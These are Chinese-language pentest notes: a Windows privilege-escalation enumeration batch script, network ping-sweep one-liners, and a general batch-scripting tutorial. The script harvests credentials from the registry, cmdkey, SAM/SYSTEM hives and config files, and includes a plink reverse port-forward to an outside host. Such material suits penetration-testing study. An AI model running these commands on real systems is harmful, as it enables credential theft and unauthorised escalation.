提權應用
批處理遍歷webshell可訪問目錄
opendir、readdir、is_dir、is_writable這幾個遍歷文件夾的函數,在php限制的情況下,找可執行目錄就沒有優勢了。
@echo off
(For /r c:\ %%a in (*) do echo %%~ta %%~za %%~fa)>list.txt
提權批處理腳本
@echo off
set userprofile=%cd%
mode con:cols=160 lines=9999
Cd c:\
echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
:: https://github.com/GDSSecurity/Windows-Exploit-Suggester
systeminfo
echo.
echo ----- Architecture -------
SET Processor
echo.
echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
:: Note, in CTF boxes its not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that users rights, pay close attention to their user folder.
echo Current User: %username%
whoami /all
echo --- All users, accounts and groups ---
net users
net accounts
net localgroup
echo ------- Administrators --------
net localgroup administrators
echo ------- Environment Variables -------
set
echo.
echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.
echo ---------------------------------------- Search for Quick Wins --------------------------------------
echo -------- Listing contents of user directories ---------
:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that maybe used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script).
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.
echo -------- Exploring program directories and C:\ ---------
:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.
echo --- Program Files ---
dir "C:\Program Files" /b
echo --- Program Files (x86) ---
dir "C:\Program Files (x86)" /b
echo --- Root of C:\ ----
dir "C:\" /b
echo.
echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---
:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless.
dir /a /b C:\inetpub\
echo --- Broad search for Apache or Xampp ---
dir /s /b apache* xampp*
echo.
echo ---Search for Configuration and sensitive files---
echo -- Broad search for config files --
:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more youll learn which files can be ignored, and which you should give a closer eye to.
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo -- Application Host File --
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo -- Broad search for unattend or sysprep files --
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo -- Stored Passwords --
:: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")
cmdkey /list
echo.
echo -- Checking for any accessible SAM or SYSTEM files --
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.
echo -- Broad search for vnc kdbx or rdp files --
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.
echo --- Searching Registry for Passwords ---
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.
echo --- AlwaysInstallElevated Check ---
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.
echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
icacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ... performing same checks but using cacls instead of icacls (for older versions of Windows)...
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
cacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ---Domain joined? If so check domain controller for GPP files ----
set user
echo.
cd %userprofile%
echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---
REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.
echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f
echo --- Accesschk World writeable folders and files ----
accesschk.exe -uwdqs "Users" c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
echo.
echo --- Accesschk services with weak permissions ---
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.
echo --- Accesschk services that we can change registry values for (such as ImagePath) ---
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
echo.
echo ---------------------------------------- End Search for Quick Wins --------------------------------------
cd c:\
echo ------- Powershell existence/version check -------
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
echo ------- Network shares -------
net share
echo ------- Programs that run at startup ------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
wmic startup get caption,command
echo -------- Path (is dll hijacking possible?) ------
echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...
echo %path%
echo.
:: I couldnt find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script
:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1
:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"
:: Or let the script do all the work for you
:: powershell.exe -executionpolicy bypass -file folderperm.ps1
echo ------- Scheduled Tasks Names Only -------
:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it).
schtasks /query /fo LIST 2>nul | findstr "TaskName"
echo.
echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.
echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------
net start
echo.
echo ------- Link Running Processes to started services --------
tasklist /SVC
echo.
echo ------- Processes verbose output (who is running what?) --------
:: Pay close attention to this list. Especially for those tasks run by a user other than your own.
tasklist /v
echo.
echo ------- Patches (also listed as part of systeminfo) -------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case its important to have this fallback.
wmic qfe get Caption,Description,HotFixID,InstalledOn
echo ------- Firewall ------
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump
echo ------ Network information ------
ipconfig /all
:: Routing and ARP tables accessible with these commands... uncomment if you wish, I didnt typically find them helpful for priv esc.
REM route print
REM arp -A
echo.
echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
echo.
echo --- Broad search for any possible config files which may contain passwords ---
:: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).
dir /s /b *pass* *cred* *vnc* *.config*
echo.
echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --"
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.
Windows命令
登錄3389的IP
netstat -an
netstat -an | find “3389″
系統信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
防火牆狀態
netsh firewall show state
netsh firewall show config
計划任務
schtasks /query /fo LIST /v
WMIC使用
腳本地址:http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar
輸出頁面:http://www.fuzzysecurity.com/tutorials/files/Win7.html
無文件掃描
ping 整個 c 段,只輸出有響應的主機。
for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
域機器對應 IP
把 net view 的結果,挨個 ping 一遍,並輸出機器名和 ip 地址。
FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)
找主機名
for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"
B 段查找
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"
win7
for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"
改成
for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"
就可以兼容 Win7 了。(Win7 ping -a 輸出結果關鍵詞為 “Ping”)
另外
findstr /i "pinging" 或 findstr /i "ping" 可以換成 findstr "[" 的 可以適合多語言環境
批處理腳本教程
1. 遍歷指定文件夾下的文件
1.1 命令解釋
命令: for [參數] %%變量名 in (匹配符) do (執行的命令)
切記:每個指令之間必須以空格隔開,in 與 ( 之間有空格,do 與 ( 間也有空格,否則命令會無法成功執行
ps:本節只講用批處理腳本執行 for 命令遍歷文件夾的場景,因此以下分析每個指令意義時,不介紹其他含義
[]:表示此項指令為可選
[參數]:參數取值一共有四種: /d, /r, /l, /f,加上無參數,所以一共五種場景
- 無參:遍歷當前路徑的文件夾下的文件,但也可在
(匹配符)中指定路徑 - /d:遍歷當前路徑的文件夾下的文件夾,但也可在
(匹配符)中指定路徑 - /r [路徑]:深度遍歷指定路徑下的所有文件,子目錄中的文件也會被遍歷到,如果沒指定路徑,默認當前路徑
- /l :當使用參數 /l 時,需結合
(匹配符)一起使用,此時()括號內部的用法規則為:(start, step, end),此時的 for 命令作用等同於 java 語言中的 for 語句 - /f :用於解析文件中的內容,本節不做介紹
%%變量名:作用類似於 for(int i = 0; ; ) 中的 int i = 0,有些區別點的就是,批處理的 for 循環遍歷每一個子項時,%%變量名 <=> 每個子項,即 &&變量名 已經是指向具體的每個子項了
(匹配符):在 in 指令之后 () 括號里的內容可表示為通配符,用於按照指定的規則過濾文件夾下的文件,如 (*.txt) 表示遍歷文件夾內所有以 .txt 結尾的文件
(執行的命令):前面的指令就可以取到文件夾內指定的每個子項了,那么接下去要對每個子項如何操作,就在這里寫,類似於 java 的 for 命令后的 {} 大括號的作用
1.2 使用示例
以下示例基於上圖中的文件路徑,批處理腳本為 test.bat
- 無參:
for %%i in (*) do ( echo %%i )
效果:遍歷當前目錄下的所有文件
- 無參指定路徑:
for %%i in (c:\softwares\VisualBat\*.url) do ( echo %%i )
效果:遍歷在(匹配符)中指定路徑下的以 .url 結尾的文件
- 帶參數 /d:
for /d %%i in (*) do ( echo %%i )
效果:遍歷當前目錄下所有的文件夾
- 帶參數 /d 指定路徑:
for /d %%i in (c:\softwares\VisualBat\*) do ( echo %%i )
效果:遍歷指定目錄下的所有文件夾,%%i 指向每個子文件夾的絕對路徑
- 帶參數 /r :
for /r %%i in (*.url) do ( echo %%i )
效果:深度遍歷當前路徑下所有以 .url 結尾的文件,因為是深度遍歷,因此 %%i 指向文件的絕對路徑
-
帶參數 /r 指定路徑:
for /r c:\softwares\VisualBat\ %%i in (*.url) do ( echo %%i )效果:同上圖
-
帶參數 /l :
for /l %%i in (1, 1, 5) do ( echo %%i )
效果:等效於 java 中的 for (int i = 1; i <= 5; i++)語句,起始值,遞增或遞減,終止值都可自行設置
- 帶參數 /d /r:
for /d /r %%i in (*) do ( echo %%i )
效果:參數可結合使用,/d 表示遍歷文件夾,/r 表示深度遍歷,因此以上命令作用為深度遍歷當前目錄下的所有文件夾,包括子目錄中的文件夾
2. 臨時變量的使用
2.1 變量的基本用法
命令:set key=value
切記:key=value 三者之間絕對不能出現空格,不能為了像遵守 java 風格擅自給添加上空格,這與 java 的 int a = 1 聲明變量不同,切記
變量使用:%key%
示例:
@echo off
set name=dasuAndroidTv
echo %name%
效果:name 可當做臨時變量使用,使用時需用 %% 將變量名括起來使用
局限:不允許在 for 命令中類似上步中聲明變量並直接使用,如下:
@echo off
for /l %%i in (0,1,5) do (
set name=dasuAndroidTv
echo %name%
)
效果:在 for 命令中聲明臨時變量,並直接通過 %key% 方式使用時會出現上圖中的錯誤:ECHO 處於關閉狀態,但如果 set key=value 臨時變量的聲明是放在 for 命令外部,for 命令內部只是使用的話,是可以的,如下:
@echo off
set name=dasuAndroidTv
for /l %%i in (0,1,5) do (
echo %name%
)
效果:在 for 命令外部聲明臨時變量,for 命令內部只是使用,這種方式是允許的
2.2 變量在 for 命令中的用法
提問:那么如果要在 for 命令中才聲明臨時變量,並使用的話,該如何做?
for 命令中臨時變量的使用:
- 需啟用變量延遲功能,命令:setlocal enabledelayedexpansion
- for 命令中的臨時變量使用時用 !key! 感漢號括起來的形式代替 %key%
- 理由:不清楚,google 來的解決方案,感興趣想深入研究的自行搜索
示例:
@echo off
setlocal enabledelayedexpansion
set name=dasu
for /l %%i in (0, 1, 5) do (
set name=dasuAndroidTv
echo !name!
echo %name%
)
效果:說得白一點,在 for 命令中通過 %name% 方式使用的臨時變量,取的 name 這個臨時變量的值會一直是它在 for 命令外賦值的內容,即使在 for 命令中通過 set 命令對這個變量又重新賦值,也不會生效。
那么,如果需要在 for 命令中通過 set 命令賦值后的臨時變量能夠馬上拿來使用,需要兩個步驟,一在文件開頭啟用變量延遲功能,命令:setlocal enabledelayedexpansion,二在 for 命令中通過 !name!方式來使用臨時變量。
3. 字符串處理
3.1 截取
命令:%key:~[start,num]%
解釋:當 %key% 中出現了 :~,則表示要對 key 指向的這個字符串做截取操作,截取操作支持以下幾種形式:
- 截取指定位置開始的 n 個字符串:
%key:~0,4%,表示截取從下標 0 開始的之后 4 個字符 - 截取從指定位置開始的整個字符串:
%key:~4%,表示截取從下標為 4 開始的整個字符串 - 截取通過倒數方式指定開始位置的整個字符串:
%key:~-2%,表示截取從倒數第 2 個字符開始的整個字符串 - 截取通過倒數方式指定位置開始之后的 n 個字符串:
%key:-4,2%,表示截取從倒數第 4 個字符開始的 2 個字符 - 正數倒數方式相結合:
%key:~2,-2%,表示截取從下標 2 開始到倒數第 2 個之間的字符串
示例:
@echo off
rem (rem表示后面是注釋的內容,類似於 java //)原始字符串
set name=dasuAndroidTv
rem 注釋內容:表示截取從下標 0 開始的之后 4 個字符,輸出 dasu
echo %name:~0,4%
rem 注釋內容:表示截取從下標為 4 開始的整個字符串,輸出 AndroidTv
echo %name:~4%
rem 注釋內容:表示截取從倒數第 2 個字符開始的整個字符串,輸出 Tv
echo %name:~-2%
rem 注釋內容:表示截取從倒數第 4 個字符開始的 2 個字符,輸出 Android
echo %name:~4,-2%
rem 注釋內容:表示截取從下標 2 開始到倒數第 2 個之間的字符串,輸出 id
echo %name:~-4,2%
3.2 拼接
命令:%key1%%key2%
解釋:將要拼接的那個字符串直接跟在被拼接的后面即可,不需要任何拼接操作符
示例:
@echo off
set name1=dasu
set name2=AndroidTv
echo %name1%%name2%
rem 這里是注釋內容:輸出 dasuAndroidTv
3.3 替換
命令:%key:被替換字符串=替換的字符串%
解釋:不解釋了,直接看示例,很容易明白
示例:
@echo off
set name=whoAndroidTv
echo %name:who=dasu%
rem 這里是注釋內容:輸出 dasuAndroid
3.4 文件特殊操作
如果是在 for 命令中遍歷了某個文件夾下的文件,那么此時可以通過一些特殊命令來獲取這個文件的各種信息,直接看示例:
@echo off
for %%i in (*.txt) do (
echo %%i
echo %%~fi
echo %%~di
echo %%~pi
echo %%~ni
echo %%~xi
echo %%~ti
echo %%~zi
)
解釋: 在通過 for 命令遍歷文件時,%%i 根據不同的 for 使用方式,內容也有所不同,具體見第 1 節。在上述這種用法下,%%i 指向了當前目錄下每個文件名,完整的文件名。
那么,此時就可以通過一些特殊命令來取得文件的相關信息,比如:
- %%~fi:表示獲取該文件的絕對路徑信息
- %%~di:表示獲取該文件所在的盤符
- %%~pi:表示獲取該文件的路徑,不包含盤符的信息
- %%~ni:表示獲取該文件的文件名,不包含擴展名信息
- %%~xi:表示獲取該文件的擴展名
- %%~ti:表示獲取該文件的上次修改時間
- %%~zi:表示獲取該文件的大小
3.5 截取某個指定字符前的部分
其他語言對字符串的處理基本都有類似 indexof 方法,在批處理中,可以用 for 語句對字符串進行處理來達到這種效果。
示例:
set name=woshidasusu_android
for /f "delims=_" %%i in ('echo %name%') do (
echo %%i
)
輸出:woshidasusu
參考
https://www.cnblogs.com/dasusu/p/9058554.html
http://www.fuzzysecurity.com/tutorials/16.html
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/